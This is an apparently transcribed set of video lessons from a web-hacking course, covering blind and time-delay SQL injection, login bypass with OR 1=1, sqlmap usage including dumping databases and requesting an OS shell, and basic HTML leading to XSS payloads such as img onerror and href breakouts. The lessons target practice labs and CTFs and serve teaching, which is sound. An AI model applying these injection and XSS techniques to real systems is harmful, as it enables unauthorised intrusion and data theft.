payload or our options, our target position. There we go. And we're going to go ahead and let this run. Oh man, bummer. I accidentally, we'll clear that. I accidentally added too many. Okay, so we'll start the attack and we'll click OK, and you'll be able to see how much quicker this was going than it was before. I am not real sure why this is not starting. But while that is going, I'll show you what happened. So you saw earlier how we had the length was different, and we had brought back the response length, and we knew which character it was, just in case this doesn't start for me and it is not working. What we'll do is you would come back to burp, and you would leave this as A, and then you would change this, or you would leave this exactly how it is with the payload options, and you would change your position right here to a 2, and then you would change it to a 3, and then a 4 and a 5. And what happens is we're doing the same thing, only we're doing it manual. So we're running the alphabet all the way through position number 1, and then we're going to run the alphabet all the way through position number 2. And in your payloads, in here you can actually add numbers and characters which might show up in a password in a capture the flag situation. And so you wouldn't just be running through the alphabet, you'd be running through characters as well, but you would go through position number 1, position number 2, position number 3, and usually in burp, when it does work, it runs much faster. But for some reason, I can't get it to run at all. But that is the process of how to do a blind SQL injection, and I will see you in the next video. Okay, we are going to look at the blind SQL injection with time delays, this one right here, and this is going to be pretty important for you to learn, but it's also pretty simple to understand. The reason you're going to want to know this is it is going to be used as your proof of concept when you submit bugs to the bug bounty programs. Most of the programs, I would say all of the programs, don't actually want you to pull down any information for security purposes, and so they're not going to want you to pull down table names, columns, or anything like that. And so what you'll do is, if you find what you believe to be a SQL injection, you will inject a time delay, and then you will submit that to the program. It lets them know that they have SQL injection, you're allowed to run commands, and you have not pulled down any information. And if they want you to do something like discover a table name or columns, they'll respond and let you know. And so the time delays are going to be really helpful for you in your bug bounty hunting career. And so I actually already have it open, and they're pretty simple. But I also want to look at the cheat sheet because they're going to be different. And we're only going to be looking at this one right here. The blind SQL injection with time delays is really simple to the one with conditional responses, which we just looked at. The only difference is you would be running a case then statement, which if you're a programmer, it's like if then, and you're going to be saying if this is true, then sleep, and rather than if this is true, we're looking at the welcome back like we were in the previous one. It'd be different, so it would just sleep 10 seconds or 5 seconds. 10 seconds is kind of a long time to wait. So what we'll do is we'll come in here, and you can open this one up. Oh, I closed out of burp. I'll go ahead and pull that open. Yeah, if you remember from the previous lecture, I was having trouble with burp. I couldn't get it to run what I was trying to get it to run, and I had to close it out. So we'll go ahead and let that open, and we'll look at the cheat sheet while this runs. So with the cheat sheet, these are all going to be different. So you'll have to run this to get your program to sleep, for your delay with Microsoft, it's going to be like your syntax is going to look like this. For PostgreSQL is going to look like this, and MySQL is going to look like this. And so each one is going to be a little different, and you might have to just try each one and see what comes back for you. Okay, so this is, we're going to have to solve the lab, we need it to sleep for 10 seconds, which is kind of a long wait, but 10 seconds feels like forever when you're waiting for a response to a GET request. So we will go ahead and turn the interceptor on and open this up. I think I clicked in the wrong spot. Oh, there's a tracking ID. We have one right there. And this will look, let's see if it says it's blind, so it's not going to have anything for us. I'm actually going to go ahead and go to an item so that I know I'm in the right spot. You guys don't have to watch me fumble around like you are right now. So we'll go ahead, send that to repeater, and the SQL injection that we're looking for with the time delay is the PostgreSQL right here. So what we'll do is we'll use this syntax right here, the PG sleep 10, and we're going to have to concatenate it to our query. So it's just two pipes, which is just above your enter key or your return key if you're on a Mac. And then you just type in the syntax exactly like you just saw. And then we don't forget to comment out the rest. And that should take 10 seconds for our response to come back. And once that response comes back, we should have a solved up here. And so the time delays are really simple. They're really easy to run, and this is how you do it. I'm not sure why that didn't come back as solved. Maybe we have to go ahead and forward this. There it is. There's the solved. So they're really simple to run. They're really easy proof of concept. You can change this to 5 seconds if you're impatient like I am, and wait just 5 seconds instead of 10, but you have to do 10 here to solve the lab. And so this will be really helpful for you. They don't really have any more practice labs for this other than the one that we saw where you're going to basically go through and do everything we did in the previous lesson, only with a case then statement. To see if the query is true, it will sleep for the amount of time that you've put in, and if it's not true, then it's just going to come back immediately. And with that, we have just a few more SQL injections that are common in capture the flags, but very uncommon in a real world scenario, and we'll go ahead and look at those next. Okay, we are going to try our final SQL injection. I've gone ahead and opened up OWASP Juice Shop, and this is where we're going to try our final SQL injection. So these login user emails and the passwords are saved on a database. And so what we're doing is putting in our single quote and looking to see if we can log in. So if you want to try this, here you can just come over here, go to the account, click on login, and you will be brought to this page. And so what we're doing is when you're trying to bypass a login and you're just trying to send it a true statement. And so what we do is we close off everything that comes before this single quote. And then we put in our own true statement, and it will log you in as the first account within the database. And so it's really simple. You would just type in or, and then we put a true statement, which is just 1 equals 1, and then we comment out the rest of the query. And so what you do on your password, you can literally type anything you want because it doesn't matter. This is commented out from here. And so we have our true statement, and then we hit login, and we have now logged in as the administrator. And so you can actually take this and try it in our labs we were doing on Portswigger. You can come down here and you can click the last SQL injection that has allowing the login bypass. And so you can come in and you can open the lab. I actually have already opened it, and you can try it right here. You can click on the login and you can try to log in the exact same way we just did. I'm going to go ahead and let you try and figure this one out on your own. It's really simple. It's actually the exact same as the OWASP juice shop that we just did. So I'm confident you can figure it out on your own. And if you have any questions, you can let me know in the comments below.
Okay, so we are here on tenant, and I went ahead and moved over to the login.php so we would have something like this. I want to show you a tool called SQL Map. It is going to be really helpful for you as you are new and trying to figure out how to best exploit SQL injection. But this is a tool you're definitely not going to want to run on a bug bounty program. This would be specifically for a CTF. I don't even know if you'd want to run it on penetration tests because it is very noisy and it just injects all kinds of things all over the application and can actually do some harm. But it is a tool that is really popular. You're going to see people talk about it. You're going to see it in walkthroughs. So it's one you need to know about. So what we can do is just put in some gibberish right here, go to burp intercept, and we'll send this to repeater. Can turn this off, and we're going to want to save this file right here. So we're going to go save item. I'm going to save this into the SQL file that I just made right here, and we'll name it test.request, and we'll put test in there, and we can save this, and now it says that it has saved. And this is really the easiest way you're going to find, or at least the easiest way I have found to run SQL map. So you just go SQL map, and then we go -r for a request, and then we named it test.request, and then you'll run a -- batch, and this will automatically go ahead and run default tests on the web application for us. And let's say you actually did find some kind of vulnerability, you can just come up here and you can go, I think it's --dbs to dump databases. We can actually look real quick and say help, and I'm pretty sure it's going to tell us, let's just run a -h. And in here, we can see we want to enumerate database users. You can run a -a and it will retrieve everything that it has the possibility to retrieve, and you can use this, but it does take a really long time. I think it is a --dbs, even though I'm not seeing it for getting the databases, and then it'll ask you within SQL map, like, would you like to enumerate users, and it'll do something like this, and you can just say yes. It'll tell you all the things that it has found, and you can even get a shell from SQL map. I've only done that a very few amount of times, like maybe 3. Will this actually work for you, or the --os pwn, and it'll ask you up here, it'll say, would you like a shell? And you can say yes if the option is available. SQL map is just one of those tools that is really complicated. So I would say probably every 1 out of every 5 times I use SQL map, I have to go to Google and read documentation because there's so many different things you can do with SQL map. And so if I was to cover SQL map completely, it would take 30 minutes and then you would probably just forget most of it. So I just want you to be aware of SQL map and know this is probably going to be the best way for you to run a SQL map when you find an injectable point. There's one other way I want to show you how to run SQL map. So let's say we have a parameter passed in up here. So you have like a question mark. All right, this works great. We'll just run it with this just like this. So you can copy this right here and you would run an SQL map dash u, and then you would put in quotes the URL that we just copied, and this is going to need HTTP or HTTPS depending on what port we're on, and I'm actually not sure what port we're on. So we can run HTTP / tenant, and then we have everything we need right here. And then if we wanted to check just a specific spot to see if it's injectable, you can delete this one, and then you'd put a star right here, just one star, and it'll actually go through and see if this spot is injectable. And you should be able to read through the documentation, and it'll tell us, like right here, we can run the techniques, and you can just do something like this, and it will run for us. So I think we can actually just run that like this. We can go -- technique equals T, and it looks like I spelled it wrong, and it'll say, do you want to use this custom injector? And we would say yes, this is where we want to inject, and it's going to go through and ask us a bunch of questions, and it'll ask us, do we want to do the cookies? You can do yes or no, and eventually it's going to start running, and it's going to see if that specific spot is injectable, and it obviously is going to say that it does not appear injectable because it is not. So these are the two most popular ways you're going to come across running a SQL map injection. We'll be using a URL like this with a star, and then also going into burp and saving a request such as this right here and running this -- batch. And then when the time comes, your query will get a lot longer, and I can't remember the specific syntax, but you'll be running something like a -- DBS and then a -- table, and you're going to give it like the database name. So the database name was users, and then the table we could say is passwords, and then it will pull down for us all of the users from the database users, and then it'll pull down like from the table the passwords and something like that. So this is SQL map, and you're going to just have to check out the documentation every time you run this, because I actually don't think that batch is in there when we're looking for specific tables. So this is how SQL map is used, and it is going to be a useful tool in CTFs. And now that you know how to run it, you're going to understand when you see SQL map elsewhere what people are talking about. But I would recommend not running it if you're in a bug bounty program, if you're going to run it in a penetration test, to ask the client ahead of time, because it could cause some problems. So I would say SQL map does not always work for you, but it is a great way to test for SQL injection. And when it does work, it is really great and really easy. You just have to check the usage and the documentation. Okay, so here we are at CodePen.io. We're going to be starting out with basic HTML and how to understand it. So you can come over here and go to this web application and click Start Coding, and it will load up for us what we need. You might have a display that looks something like this or this. I like it all the way over here to the right, so that way my actual website will look similar to the way you would see it in an actual browser. So we can come over here and minimize this, and we can minimize this because we're not going to be dealing with CSS or JavaScript just yet. And basic HTML and tags, I want to show how HTML tags look. So HTML, what is HTML? It is the hypertext markup language, and it's the language of the internet. There's also XML, which is another markup language, but we're not going to deal with that just yet because we are on HTML. So when you come to HTML, you can make static websites. They won't look very nice, but you can make them, and you can do this with just HTML. And so let's just start coding along, and you'll be able to understand it as we go. So let's say we're making a journal entry to a book, or we're just making a table of contents. You could start out with just a basic H1, and then you'll make another H1, only you're going to put a /, and we're going to close it out. And then in here, we can say this is a title. And then it will render for us over here. And we have this closing tag. And this closing tag is actually really important because let's say I had by me. And as it loads this, it's going to put all of this in here. and it puts it all in big font. And when we close this out, like we already saw and the way you're supposed to do, it will load it differently. You can see the H1 makes the text really big. And let's say we want to enclose this. Actually, we'll enclose the me down here with an H2, just like this. And you can see this has changed right here. And you can see that it is smaller. And if we make this, let's say we want to make this an H4, you can see as the numbers go up, the size of the font gets smaller. So the H1 is for the top heading and everything gets smaller. And then you also have a paragraph tag that looks like this. And in here would be what you would consider a paragraph. So you can just write in here something, and then we can close this out just like this, and you'll be able to see that it renders just the same. And now we have this paragraph tag. So you have headings and paragraphs, and you can format the text and the style with a CSS, which we will do later. But right now, I just want you to have a basic understanding of how HTML works and get to understand and be familiar with these tags. You can actually go to a documentation website for such as W3 Schools. And so for now, I want you to get an understanding of these tags, and you can go to W3 Schools and read the documentation about all the different tags. And we're going to see quite a few different ones as we go along, but these tags become really important for cross-site scripting and other vulnerabilities because we're going to have to learn how to break out of these tags in order to insert our own malicious code in the future. Okay, so now that we are familiar with a closing tag, there are some kinds of tags that do not require a closing tag, and these are typically tags that do not have any input. Like these all take some kind of text that they render on the page. There are some tags that are self-closing, such as a break tag, and this tag does not take any text or input, and what it does is it spaces out these gaps right here. And there is also another tag called an HR tag, and this will place a line underneath of the text. This is usually done in like basic resume style HTML websites. You won't really see a whole lot of this in actual web applications. And if you do, usually stuff like this is done with a border inside of CSS in a div. But this is something to be aware of, that there are self-closing tags within HTML, and you will probably see these. I want you to be familiar with all the different kinds of tags you are going to be seeing when you're looking through source code and you're looking for vulnerabilities, as well as trying to figure out how to get a cross-site scripting to work. And it is always helpful to be familiar with the tags because some tags may be blacklisted while others are not, and they can be helpful in helping you break out of an HTML element in order to get a cross-site scripting to work. And another thing to be aware of, if you see something like we just saw with the HR and we see this pop up on the screen and we decide we want to add a size to it and we want to make it bigger or smaller, and you can see this is running in pixels, so if we do 39, that's going to be really big. I meant to make it just 9. You can see that our line shows up, and I think you can also add a shadow, but I don't remember how to do that with an HR tag. If you ever see this and you're wondering, wow, I really like how this looks, I would like to be able to make a tag that looks just like this one on a web application. You can inspect and you can actually just look to see exactly where it is at. Let me see if I can. We'll grab this, inspect, and right here you see the HR size 3. And it's really important to be familiar with inspecting specific things because it's possible in the future that you're going to have an input field and you are able to search. It renders within the HTML, and you're going to need to be able to inspect to see where the word is within the HTML so that you know exactly what you need to do in order to break out of it to get your malicious code to run. We'll get more into that in the future, but for now, let's continue with HTML and what it looks like and becoming more familiar with it. We're going to move on from here and we're actually going to install a text editor. I'm going to have you install Visual Studio Code if you're new, or you can use whatever text editor you would like, but I'm going to be using VS Code. So what we can do is come over here and we can just type in VS Code just like this, and you will come to this page right here. You can click download and you can download it for whatever OS system you are using, and you can go ahead and download it and then install it. It's pretty simple to install and open up. And when you're here, you will want to make a new folder. And I'm just going to leave it. We can barely see my folder over here. I'm going to rename it as test app. You can call yours whatever you would like, and then we're going to open it up. So we'll come over here, click open, go to desktops, and I named it test app right here. And I can open this and it will open over here just like this, and we can open up a new file and say index.html, and when we hit enter, it's going to open up our index.html. Because we're in VS Code, right here's where you go to install plugins. I'm just going to have you install one plugin right now, and we're going to type in boilerplate. I think you could just type in boil, yes, and it goes ahead and opens us up. We want HTML boilerplate, and you'll hit install right here. I already have it installed. And then when we come back to our index.html, if we just type in HTML, we can go down to this 5 right here and hit enter, and we'll be given the boilerplate. And now you can delete this right here. This is how we want to keep this, so we can save this right here. And a helpful tip to render what we have going on in a browser, we can just right click and we can just say we want to open with Google Chrome, and it will open up a page for us like this. I actually want to put this page over here so you can see it. And if we just come over to our body right here and we just type in, and let's make it in H1, and we'll just say hello world, save this. And if we come over here and refresh our page, it will render for us our hello world. So now that we know everything is working, we're going to begin looking at a little more in-depth advanced HTML that we will need to know in order to break out of our HTML to perform cross-site scripting and insert JavaScript. So with that, I'll see you in the next video. All right, so we have our own little web application running over here, and now we're going to enter a little bit in here. So instead of this H1, we can enter our name, and we'll make like an entry that we would see into something kind of like a Wikipedia page. So you have a name, and then you're going to want a title, and the title is going to be what goes on up here, like create a plan or a React app. We're going to go ahead and name it, and this actually goes inside the head tag. And so we can open this up, title. I guess I probably shouldn't open that up, because if I close it off, I think it'll automatically close it for me. And we can say Ryan's site, and then we'll save it. And then if you come over here and refresh this, it should refresh for us. We got your site and your name, and you can add in a paragraph tag. So we can say, what do we want to say about ourselves right here inside this paragraph? And we can say, I am learning to become a hacker. So this is true for all of us here. And what maybe we want to make this hacker right here, we want it to be italicized and bold. So we can come in here and we can say we want all of this to be emphasized, and it close that off there for us. And we'll paste it over here and we'll save this. And maybe we want the word hacker to be bold. So we can come in here and say we want this to be strong. And we can move this as well. And now if we save this and refresh our page over here, it has all become italicized. I'm not sure why this didn't become bold for me. I believe that's supposed to be bold, but that's okay if it doesn't work for us. My goal right now is for you to be understanding that there are different tags, and we can actually add in a break tag. Like say we decide we want this word hacker right here to be on the next line. We can add in a break,
and we can refresh it, and now we have it on the next line. And maybe we decide after this that we want a line underneath everything, and so we'll say we want the HR in here for the line break, and if we refresh this, we now have our line. So we're starting to get a entry form here, kind of like a Wikipedia page. I actually should look at a Wikipedia page so I know what they actually look like. But anyway, my goal for us is to begin to understand these tags, and we're going to look at a few more tags, and then we're going to start looking at what goes inside these tags, because sometimes you'll be inside of something that looks like this, and you're going to have to figure out how to break out of this tag, because your entry input will be saved inside of a source or inside of something within a tag. And so we're going to learn more about inputs over here in just a little bit. For now, we're going to look at a few more tags that are going to be really common and you're going to see a lot when you look at page source. Now that I'm about to close this out, I actually see that I spelled the word strong wrong here. So if we save that and now we come over here and we refresh our page, it becomes bold for us there. So inside of our HTML and our tags, we will need to spell things correctly. Otherwise, the interpreter will not know what we're doing or how to translate it into the web page. Okay, with that, I will see you in the next video. Now I want us to look at lists, and in the next video we're going to look at image tags, which are going to be really important because they're a main way to get an XSS to work, and so those will be coming up. But for now, we have our little web app that looks like this, and underneath the HR we're going to add in a list, and the way to add in a list can be done with a UL, and you just add in an li like this. And now we're going to type into our list, and we're going to go ahead and put in I have learned about tags. And in our next one, dang it, in the Python text editor, you can hit tab and it'll go past your tag for you, and then you can go down to the next line. So we'll add another list just like this, and we're going to say I have learned about lists, and then we can say lastly, next I will learn about image tags. And now if we save this, come over to our page and refresh it, we have these bullet points just like this. And if we wanted them to be numbers, it's pretty simple. You just would change this to an OL like so. And I forgot to save it. And now we can refresh the page, and we have 1, 2, 3. So these are lists and tags. You'll see these sometimes. You'll be able to have inputs, and one of the really popular places to see something like this is inside of some kind of task manager or something. You will see these in live programs or maybe in a penetration test where you're testing some kind of application that is supposed to help you schedule, and you'll be able to input lists and things like this. And maybe there will be some way for you to inject either over here or over here, but these are the li tags and this is the ol. So when you see these in a page source, you now know what is going to be going on. Now we're going to move on to the image tag, and we're going to pop our first cross-site scripting, only we're going to use an alert because we're not going to be injecting it into anything. But I want you to see how it works, because you're going to see these image cross-site scriptings a lot in the future. They are really popular if you can get one to store for the cross-site scripting to pop every single time the page loads. So with that, we will move on in the next video. A few more things to go over and learn before we are ready to start practicing cross-site scripting elsewhere. And the first thing we need to cover is an image tag. The image tag is going to be one that you're going to see a lot in CTFs and practicing cross-site scripting, because it will automatically render on the page whenever it is loaded, or if there's some kind of submit button for an on error to cause an event. So with that, we will just start out with a basic understanding of inserting an image. So if you just type in img, it should load for you. You have this alt, which is what's going to load if the source doesn't work. So we can just say Ryan, because I'm going to use my image, and if we save this and we'll say the source is lost, so obviously there's not going to be any source. If we come over here and we refresh the page, we see Ryan, and it tells us the little image is not found. But if we go out to, say,
Google and we type in who am I, and we type in PhD security, and then we go to images. Here I am right here, and we can copy the image address right here. Make sure I'm trying to read those, make sure that's right. And if we paste this in here and then we save this huge link, when we refresh our page, our little browser that we have created right here is going to go out to this linked address that we have right here on YouTube to grab my image, and it's going to ping it and make sure that we have permission to load this image right here. So if we save this and refresh, you can see my image has popped up right there. Now I don't like where this is at, so I'm going to delete this, and that's one way to grab an image, and you will probably see that in the future, and you'll definitely see when images aren't loaded. That's usually what's happening. Now I already got the photo over here, same photo. You will see this as well. This is the most common way to load an image, and it's also the most reliable way. I actually want to put it underneath my name because it'll look better in our little wiki page right here. So if we do our same thing and we say image, and the source is just ryan.png because it is already loaded right here for us, and we save it, we can put in the alt, would just say my name, and we save it and we refresh it. You see it moves up here, and that is because it's grabbing the link right here. Now, I think the most popular way to perform a cross-site scripting, especially in CTFs that don't have any kind of blacklisting, is going to look just like this. Source, you just put some mumbo jumbo in there, that's not going to work. And then an alt doesn't really matter. What you're going to see is an on error, and then it's going to do something. And usually the do something is going to be alert and 1. And then save this, refresh our page, and you see the cross-site scripting pops right there for us. And you'll see something like, sometimes people will put in a 1, sometimes people will put in XSS, and sometimes you can just see a 1, 2, 3, save it. We got too many closing brackets, and on our page over here, refresh, we see this page says 1, 2, 3, and that is going to be probably the most common cross-site scripting that you're going to see in beginner CTFs. And the reason you're going to see it done like that in the beginning is because this is really easy and your input isn't being stored anywhere. We're going to get a little more complicated as we go along with the cross-site scripting. This is how you're going to see images loaded in HTML, and this is how you're going to see a lot of cross-site scriptings performed. You're going to see this image payload all over the place. So if we come back to our payloads, look, we have image, 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 and you always see this on error, and here's an on click. And you're just going to see a lot of these image tags. Here's another image tag. And so you're going to want to be familiar with understanding the image tag and then how to perform the cross-site scripting with it. As we go along, things are going to get more interesting and a lot more fun to try and break out of. I know cross-site scripting doesn't pay a lot of money usually, but it is a lot of fun to break out of the HTML tags and bypass the bad characters. So with that, we're going to look at hrefs and hyperlinks in the next section, and then we're going to start looking at getting cross-site scripting to work for us. And then after that, we're going to start looking at cross-site scripting and breaking out of HTML tags. So with that, I will see you in the next video. Okay, so we're here with our code for our very simple website that we have going on right here. And so far we have just a static website with nothing really going on. And I want to move on into hrefs, and we're going to build this inside of an anchor tag. So right now, if we refresh this page right here, we're going to get our XSS. So we're going to go ahead and comment this out. I think you can just click at the end of the line. Yes, you can. You can click at the end of the line, and on a Mac you hit command / or command question mark, and it comments out the line there for us. And below this, we're going to add in our anchor tag, which is just going to make us have a clickable link. So we're going to go href, which this is going to be the link that we are actually wanting to add to our website. And we're going to just give something very basic like google.com. So we can go https / and then we go www.google.com. And if we save this and then we come over here and refresh, you will see our link when we add it in over here, Google. I forgot to add that text in, and I forgot to save it, so we'll save it, refresh our page, and now we have this link right here, and if we open link in new tab, we are taken to Google. So this is really simple, and you can actually, I've actually been seeing these little anchor tags also inside of the source right here become a place for cross-site scripting. I'm not really sure why developers have been making it so your user input, say there's like an input box, or you can just come up here and you would do something like this and just add in a parameter of something equals and then XSS or script right here. I've been seeing at least twice in the last month that right there, that XSS would get stored either right here or right here. And all we have to do is break out of these little links or the source or the href in order to get our cross-site scripting to work. So we'll just pretend for now rather than actually build an input, because that's going to require some JavaScript in order to get it to be saved inside of this link. But one of the things you should always do and always check for is if you can add in a parameter right here like this, or you're able to just insert something into like a text field and hit search, like on a search bar on Amazon or Google, and then you inspect the text like this. You should always check to see if your information is getting stored in here, like this cross-site scripting. You should always come in here and look for the cross-site scripting or your keyword that you were able to put into the input. So I want to just show you like how to break out of this for cross-site scripting. Let's say we're able to add a parameter and it adds it into this google.com. The most recent one that I saw, it was actually appending what I put in as a parameter down inside of a page one. It was like something like this, page one equals, and this was at the foot of the application. So it would have looked something like this right here. And if we save this, comment that out, and then we come back over here and we refresh this, it was down here at the bottom and it was like page one, and within this page one it had my little cross-site scripting payload that I was adding in right here. And so we'll pretend that is what we have going on, is that we're able to add in a parameter and it's getting stored right here, and we need to break out of this in order to get our cross-site scripting to work. Because if you just come in here and type in script alert and then you close this out, nothing is going to happen. And I'll show you, we might even get an error. We come over here, we refresh it, and nothing happens. You click on it, nothing happens. We're not able to, because what's going on right now is we're not breaking out of the current HTML. And there's a couple of different ways to go about this, and this is all going to be trial and error. And sometimes when I come across something like this in the wild, I'll just copy this and I will paste it into a text editor just like this, because the colors are going to change when the payload is ready to work. So you should be aware of copying this and bring it into a code sandbox or some kind of text editor to play around with it. But I think this one is going to be pretty easy to break out of. You just add in some quotations right here in order to close this out, and then you can add a closing tag. And now if we save this and we come over here and we refresh the page, we get our cross-site scripting to work. And they really are this easy to find in the wild, especially if you're off the beaten path where payloads have not been tested and people haven't been looking for cross-site scriptings like this. The one that I found really was this simple. All I had to do was come up here into the URL and I just added in a random parameter. So you can just add in, for the sake of example, a CB, like a cache buster, even though we're not doing web cache poisoning. And then you can just add in a parameter of payload, and then we would say equals. And the way you would get this to store is you would type in our script that we put in just like this in order to close off this anchor tag. And then we just add in our payload. And so you'd go like this and you'd say script, spell it right, script, and then we would have alert, and then we would close off our payload just like this. And then you submit this. This is how it worked for me, and this right here was getting stored inside of the href just like this. So that is one way to pull off a cross-site scripting inside of a anchor tag. And sometimes you'll see these inside of something like this, because if you're familiar with Burp and you see the header tags and it sends a referrer header showing where you came from in order to get to the next page. It'll have in the previous website that you've come from, and I actually came across a website that was storing the previous URL inside the HTML in a hidden input field, and all I had to do was copy it and then basically do the exact same thing we were doing earlier and just add in our script just like this in order to get the alert to work. So you can look out for these in a lot of different places, such as an href or inside of a source. And just be aware that where you put things within the input may get stored randomly within the HTML, and then all you have to do is be familiar with HTML, such as closing off the quotes, and then closing off the tag, and then pulling off the cross-site scripting. So with that, we're going to move on and look at some more HTML in the next video. All right, so there's two things I really want to show you before we move on from HTML, and we take just a second to look at CSS, and then we move into JavaScript, and that is hidden information as well as forms. And so we'll just start out with forms, and it will naturally lead into the hidden elements. So a form is pretty much just what it sounds like. It is one of those things that usually includes inputs and information that you're going to be taking in from the user. So usually within a form, you'll have a class, which we're actually not going to mess with until we get to the CSS, and then you'll have some kind of action typically, and this is going to take you somewhere, and we're not going to mess with that really either. And then we're going to also see a method, which we're not going to mess with as well. This is what would be sending the information to the server. Okay, and now we're going to want to add in a label just like this. And inside of this label, we're going to delete that, and we're just going to say your name. So we have this your name right here. So if we save it and we come over to our page and refresh, you will see it pop up on our page. And I added in this little HR so that you could see the division of the information. And right here is the your name. So we have our label, and now we want to take an input. So what we will do is add in an input. So we just say input just like this, and it's going to be a type text, and we're not going to mess with the ID or the name at this point. And if we save this, you're going to see just a box appear over here. And so it says your name, and then we have this text box. We're going to end up adding a button as well. So we will say we want a button, and it's just going to say submit, even though our button at this point is not going to do anything. And we can save this and refresh, and now we have your name with this text box and a submit button that does nothing. And then lastly, you're going to see within these forms is a password, and you're going to see something like another input just like this, and instead of the type text, you're going to see a password. And if you save this and we come back over to our page and we look at this, actually we're going to go ahead and add in a break because we want this on a new line. So we save this, we refresh it, and that's pretty ugly. And you'll see we have these little hidden dots just like here. This is to secure the password, and you'll see these a lot on web applications, but now they've started adding in this little eye over here for you to be able to see what you're typing in, because if you know any HTML and CSS at all, you know that you can just right click this and you can inspect, and then you can come in here and just change this password to text and then look at it just like this, and you can see the information that is being typed in here. And this is why people, when they use public computers, should never save their password, because if you use a public computer and you log in and you accidentally hit save password, then the next user can come in here and repopulate the password and look at your email and password and have your information, which would be very bad. So don't use public computers to enter in literally any of your data that is important to you. So there's one more thing I want to show you, and that is the hidden option. And so we're going to actually use a div here, and I want to show you that you can just type in hidden right here, and usually this hidden will be something other than the actual word hidden. There's other ways to hide elements within HTML, but we're going to use hidden because it's really simple. And then sometimes you'll see something like ID equals 8. And then if we save this, I've never actually seen this in the wild, only in CTFs. So this is not going to be something you're probably going to encounter in the wild, but you will probably see it in CTFs, as I've seen it in several CTFs. and you come over here and you refresh this page, you can see that we have this div ID 8 and it's hidden, and we can unhide this by just deleting the word hidden, and now the ID shows up on the actual page. And usually within CTFs, this ID 8 will be within a form, and you would just change this 8 to something else. So you could come down here and say, we're going to change the ID to 1, which would typically be an admin, and then you would hit the submit form and it would change your ID to 1. That's usually how it'll work in CTFs. I've never actually seen this in the wild, but it is something to be aware of, that you can change this hidden to anything. You can just delete it, and then you can change things within forms that have been hidden quite simply just by changing it. So that is something else to be aware of within the world of HTML and CSS. All right, so we have a future edit here, and I just want to say the reason that this would work in most CTFs is because if there is no JavaScript to check the user ID input, then when you hit the submit button, it would go ahead and send it. But in most cases, there's going to be JavaScript to check such functions. So a lot of times this is not going to work, and we will cover this more in the future. But for now, I have seen this in CTFs where you can change an ID because there's no JavaScript checking to make sure that the user client side input is what it is supposed to be. In the next video, we're going to give just a quick look at CSS because we're not trying to be web app developers. I'm not going to spend a lot of time on CSS, just going to give you a quick overview so that you know what it is, and when you see it, you'll be able to recognize it and know that it really isn't anything important to you unless you are crazy good and you can pull off some kind of remote code execution through a CSS injection, which can happen but is really advanced. So we're going to just look at some simple basic CSS so that you are aware of what it is and you aren't questioning when you see it inside of some source code. I'll see you in the next video. All right, we're going to have a look at some CSS. We're not going to spend a ton of time working on our little website here, making it look nice. For me, I am not a designer and I don't understand web design and fashion or anything like that, or color coordinating. So in the world of web development, this is, for me, the most difficult part, is making a website look nice. Some people are just gifted as designers and I am not one of them. So I'm just going to show you how CSS works in two different ways. I'm going to show you internal CSS and I'm going to show you external CSS. So that way when you come across CSS, you know what you're looking at and you're familiar with it. I'm not going to actually show you how to design a web app because that is not my area of expertise and it's not my gifting. If we want to do some internal styling, we can just come in here and type in style and we can hit enter, and then we have this H1 right here that has our name in it. So we could just very easily just type in H1 and then we open a set of curly braces and then we can just type in color and then we can just type in aqua. Looks like a great color, and then we close it off with our little colon there and we save it and we come over and refresh our page. I see I didn't type in H1, typed in HR. So we type in our H1, save it, refresh, and our color changes to blue. And then maybe we want to change the word right here, hacker. There's another way you can go around doing internal styling, and you can just come in here and say that you want a color, and then we say we want pink, and then we can save it this way. And then if we refresh it, our color works. So there's several different ways you're going to see internal CSS, and this right here is the most common. This happens, but it doesn't happen very often. So when you're out in the wild, you will see CSS function like this, and you can also do a lot more with this. We're not going to cover it, so you could come in here to this H1 and you could type in something like padding, and you can say padding left, and then we could say like 200 pixels. And then if we were to save this and come back over and refresh it, you'll see that the name moved. I'm not sure if there is a centered option. Let's check it out. There is not. So there's something called bootstraps that would really help you with your styling if you were trying to become an actual developer. But we're not going to spend a ton of time with that. So you can do things like the padding left. You could do a padding for the bottom if we wanted some space.
between our information here. And you could say 100 pixels, and you could save this. And if you came over here and refresh it, we'll get a padding over here. So this is a little bit of styling. And one thing to be familiar with is a lot of times things are going to be broken up into divs. So you would have something like this right here. You would have a div, and we'll just copy this and cut, and we can paste that right here. And then we'll put another one. We'll put this right here, and then we'll put one down here between our list that we have right here. And then if we were to put something inside of here, like we say this div, we want to style it, and we say style, and then we want color, and then we're going to make this entire color red. It's going to be very bold, and then we decided to make a different div, and we wanted the entire color to be, let's say, we'll make this entire color pink, and we save this, and we refresh our page. You're going to see that everything within those divs actually changes colors, except this overwrites what was written inside the div. So we can actually just go ahead and close this out right here. And now if we come back and refresh, you can see everything becomes red and pink within the specific div. And so this is an introduction to internal CSS. You can style it either up here like this, or you can do some internal CSS. And so the divs are going to be like, you can, within HTML and CSS, you can think of everything as being inside little boxes. And there's actually a Chrome extension. It'll actually show you all of the boxes, and it's called Pesticide. And you can install it if you want. I'm not going to show it because the point of our course is not to learn how to be designers. The point is for us to understand CSS well enough to know what we're looking at so that we can figure out how we can exploit web applications when we come across it. So with that, in the next video, we're going to look at external CSS. Okay, in this video, we're going to look at an external style sheet, and then I'm going to show you why this was important for you to learn. So the first thing we're going to do is we can just go ahead and delete these inline styles that we put in right here, so that way we have our blank page like we did before. And we can just go ahead and delete the style altogether. And then if we save this and go back to our page and refresh, everything is back to how it was before. Now, what we are going to do is come right here, and we're going to add a folder just like this, and we're going to call it CSS. And then inside this folder, we're going to add a new page, and we're going to call it style.css. And you can see our Visual Studio has recognized it as a style sheet. Come back to our index.html, and inside of the head tag up here, we can type in link, and it tells us that it has this style sheet, and we have the href2, and we want to link our CSS style sheet just like this, and it auto saved for us, and we can now save it. And now you can come over to your style sheet, and if we wanted to do like we did before, we can type in the h1, and we can type in color, and we can say red. And if we save this and come back over to our page and refresh this, our name is now red because that was the h1. We can do something like we did before with these divs, and we can say we want to give the div a color. So we could say div1, we want to have a color of blue. So we can come in here, we put our period before the div, and this is going to tell it that this is going to be our keyword. And we can say color, and we want blue, just like this. And then we'll make a div2, so we'll say period div2. I forgot this was div1, and we can say we want the color of pink. We'll go div1 right here, and we can say style div1. And I just realized that this is supposed to say class because we've given it a class name over here. And then if we give our second div a class of div2, and we save this, and we come over here and refresh it, we now have the colors have changed within our div, and our name color has changed. So this would be a form of external CSS, and I want to show you why it was important for you to know this. And it's important to know that this file was named CSS, and then we called it style.css. If we come back over here and we just check out this color palette and we inspect the page, and then you come over here to the sources, you can actually click on this CSS 